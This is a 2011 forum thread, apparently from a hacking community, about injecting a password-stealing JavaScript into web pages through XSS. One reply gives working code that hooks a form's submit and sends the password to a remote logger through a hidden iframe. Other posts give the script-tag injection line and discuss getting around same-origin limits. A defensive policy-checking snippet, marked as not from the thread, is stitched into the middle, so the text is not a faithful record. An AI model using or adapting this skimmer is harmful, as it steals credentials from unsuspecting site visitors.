Author Topic: scaryshit.js  (Read 2922 times)


Offline neusbeer

scaryshit.js
« on: November 15, 2011, 07:24:30 pm »
I found this.. didn't have the time to check it yet.
http://h.ackack.net/download/mathias-karlsson/javascript/scaryshit-js


It enables writing a given password to a log file when a user submits a
password field.


Quote
Description: A JavaScript that hooks forms including password fields and sends them to a logger through a GET HTTP request using AJAX when the user submits.


Think of the possibilities with XSS or even RFI/LFI.
I'm gonna give it a try next week when I have some more spare time,
change the code a bit,
and inject it into a page with ....
Quote
<script src="http://downloads.ackack.net/scaryshit.js"></script>


I think it's gonna work.. and that's far better than receiving cookie info with XSS. Linking the log to your own server somewhere (with chmod 775 of course :P)
--Neusbeer

Offline Kulverstukas

Re: scaryshit.js
« Reply #1 on: November 15, 2011, 08:26:13 pm »
whoa now this looks really nice. XSS just got scarier :D

Offline FuyuKitsune

Re: scaryshit.js
« Reply #2 on: November 15, 2011, 11:42:49 pm »
It seems pretty easy, I'm surprised it hasn't been done before.

Interesting method. Why setTimeout? Does that allow it to run immediately after the form submits?

Offline xzid

Re: scaryshit.js
« Reply #3 on: November 16, 2011, 04:56:04 am »
This is very simple, just grab info + iframe.

I see no advantage to using XMLHttpRequest over an iframe, and one big drawback. Also this script fails on my IE8 and AJAX makes the rest of them suck.

Code:
var form = document.forms[0]; // or loop, w/e
var logger = "http://localhost/log.php?passwd=";

form.onsubmit = function() {
    var passwd;
    // or grab all <input>'s, pass is sufficient here
    for(var i = 0; i < form.elements.length; i++)
        if(form.elements[i].type == "password")
            passwd = form.elements[i].value;
    if(passwd) {
        var frame = document.createElement("iframe");
        frame.setAttribute("src", logger + escape(passwd));
        frame.setAttribute("style", "display: none;");
        if(document.all)
            frame.onreadystatechange = function() {
            if(frame.readyState == 'complete')
                form.submit(); }
        else
            frame.onload = function() { form.submit(); }   
        document.body.appendChild(frame);
        return false; }
    return true; }
// like my indentation?

Would need tampering, but tested successful on ie8/firefox7.

Quote
It seems pretty easy, I'm surprised it hasn't been done before.
It has.

Offline neusbeer

Re: scaryshit.js
« Reply #4 on: November 16, 2011, 07:48:34 am »
Thanks for the input xzid.. gonna have a look at that one..
What's the big drawback?

My knowledge of AJAX is low, so I have to figure it all out..
doesn't seem too difficult..
xzid's code is far shorter.

Gonna check it out tonight..
--Neusbeer

Offline xzid

Re: scaryshit.js
« Reply #5 on: November 16, 2011, 08:06:09 am »
Quote
Thanks for the input xzid.. gonna have a look at that one..
What's the big drawback?

http://en.wikipedia.org/wiki/Same_origin_policy

Of course there are workarounds, although XMLHttpRequest shouldn't be able to access remote webpages (where your logger is likely located). An iframe has no such restrictions:

<iframe src="http://remote/logger.php?passwd=mypass"></iframe>
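One defensive counterpart to the injection and exfiltration paths discussed in replies #3 and #5, written here as an added example rather than code from the thread: a small evaluator that shows how a Content-Security-Policy header would refuse the injected script tag, the AJAX GET to the logger and the hidden iframe. The page origin https://app.example and the policy itself are assumptions; the URLs are the ones quoted in the thread.

```javascript
// Added example (not from the thread): a minimal Content-Security-Policy
// evaluator showing how such a header blocks the three load attempts discussed
// above. PAGE_ORIGIN and POLICY are assumptions; VECTORS quotes the thread.
const PAGE_ORIGIN = "https://app.example"; // assumed origin of the protected page

// Hypothetical hardened policy: first-party scripts only, no frames,
// first-party XHR only, and forms may only post back to this origin.
const POLICY = {
  "script-src": ["'self'"],
  "frame-src": ["'none'"],
  "connect-src": ["'self'"],
  "form-action": ["'self'"],
};

// Resolve a URL (possibly relative) against the page and return its origin.
function originOf(url) {
  return new URL(url, PAGE_ORIGIN).origin;
}

// True if `policy` lets a resource governed by `directive` load from `url`.
// Supports the source expressions used here: 'none', 'self' and host-source.
function allowed(policy, directive, url) {
  const sources = policy[directive] || policy["default-src"];
  if (!sources) return true; // directive absent and no fallback: unrestricted
  const origin = originOf(url);
  return sources.some((src) => {
    if (src === "'none'") return false;
    if (src === "'self'") return origin === PAGE_ORIGIN;
    return originOf(src) === origin; // host-source such as https://cdn.example
  });
}

// The injected <script>, the AJAX GET to the logger and the hidden <iframe>,
// each paired with the directive that governs it.
const VECTORS = [
  ["script-src", "http://downloads.ackack.net/scaryshit.js"],
  ["connect-src", "http://localhost/log.php?passwd="],
  ["frame-src", "http://remote/logger.php?passwd=mypass"],
];

// Evaluate every vector; all three come back `allowed: false` under POLICY.
function audit(policy, vectors = VECTORS) {
  return vectors.map(([d, url]) => ({ directive: d, url, allowed: allowed(policy, d, url) }));
}

// Header value to send as Content-Security-Policy.
function serialize(policy) {
  return Object.entries(policy).map(([d, s]) => `${d} ${s.join(" ")}`).join("; ");
}
```

The same header also removes the inline-script variant of the injection, since `script-src 'self'` without `'unsafe-inline'` refuses inline code.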

Offline neusbeer

Re: scaryshit.js
« Reply #6 on: November 16, 2011, 09:08:39 am »
ahh of course..
if you have write access to that specific server you can write it on the server itself and try to download it.
But the idea you mentioned is even better indeed.
That iframe idea.. I don't have a lot of skills with iframes.. so next goal, learning and understanding iframes and stuff.. also used with clickjacking, so it wouldn't be wasted time to get to know that better.
I'm gonna set up a small testing environment tonight and gonna try it.
--Neusbeer

Offline bubzuru

Re: scaryshit.js
« Reply #7 on: November 16, 2011, 06:24:24 pm »
xzid +1 for the code

gunna test it later
Damm it feels good to be gangsta
http://bubzuru.comule.com

Offline bubzuru

Re: scaryshit.js
« Reply #8 on: November 16, 2011, 08:07:02 pm »
and +1 for you neusbeer, I like your posts
Damm it feels good to be gangsta
http://bubzuru.comule.com

Offline ande

Re: scaryshit.js
« Reply #9 on: November 26, 2011, 09:40:07 pm »
Haha, that is brilliant. Sometimes I really do wonder why I haven't thought of things like this. +1
if($statement) { unless(!$statement) { // Very sure } }
https://evilzone.org/?hack=true

Offline _ANONYMOUS_

Re: scaryshit.js
« Reply #10 on: December 14, 2011, 05:29:06 pm »
Nice  ;D 
The only reason people get lost in thought is because it's unfamiliar territory